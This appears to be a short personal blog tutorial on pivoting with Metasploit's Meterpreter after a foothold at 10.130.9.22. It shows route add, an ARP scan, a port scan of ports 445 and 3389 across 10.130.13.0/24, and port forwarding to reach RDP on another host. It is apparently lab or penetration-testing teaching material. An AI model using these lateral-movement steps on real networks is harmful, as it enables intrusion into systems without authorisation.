Pivoting with Meterpreter

2022/09/01
  • 進攻是最好的防守
    •

    Run the psexec in meterpreter for accessing to 10.130.9.22.
    By exploring the environment in 10.130.9.22, suddenly found a subnet 10.130.13.119 in the victim computer. So here is the tactic to pivot to the subnet.

    Interface 6

    Name : AWS PV Network Device #1
    Hardware MAC : 02:ba:b3:20:ec:2c
    MTU : 9001
    IPv4 Address : 10.130.13.119
    IPv4 Netmask : 255.255.255.0
    IPv6 Address : fe80::f574:c767:4549:475a
    IPv6 Netmask : ffff:ffff:ffff:ffff::

    Interface 8

    Name : AWS PV Network Device #0
    Hardware MAC : 02:66:c3:d8:7b:1a
    MTU : 9001
    IPv4 Address : 10.130.9.22
    IPv4 Netmask : 255.255.255.0
    IPv6 Address : fe80::a49f:3b89:73ce:2aa
    IPv6 Netmask : ffff:ffff:ffff:ffff::

    meterpreter > run arp_scanner -r 10.130.13.0/24
    msf exploit(multi/handler) > route add 10.130.13.119 255.255.255.0 1 -> 1 means session1
    msf exploit(multi/handler) > route print

    IPv4 Active Routing Table

    Subnet Netmask Gateway
    —— ——- ——-
    10.130.13.119 255.255.255.0 Session 1

    msf exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
    setup parameters as below
    Name Current Setting Required Description
    —- ————— ——– ———–
    CONCURRENCY 10
    DELAY 0
    JITTER 0
    PORTS 445,3389
    Proxies
    RHOSTS 10.130.13.0/24
    THREADS 20
    TIMEOUT 1000

    msf6 auxiliary(scanner/portscan/tcp) > run

    [+] 10.130.13.20: – 10.130.13.20:445 – TCP OPEN
    [+] 10.130.13.20: – 10.130.13.20:3389 – TCP OPEN
    [+] 10.130.13.119: – 10.130.13.119:3389 – TCP OPEN
    [+] 10.130.13.119: – 10.130.13.119:445 – TCP OPEN

    meterpreter > portfwd add -l 3389 -p 3389 -r 10.130.13.20
[*] Local TCP relay created: :3389 <-> 10.130.13.20:3389
yyy@xxxxxxxx:~$ rdesktop 127.0.0.1

    關於作者

    Nelley,乃力。
    就是一個村民。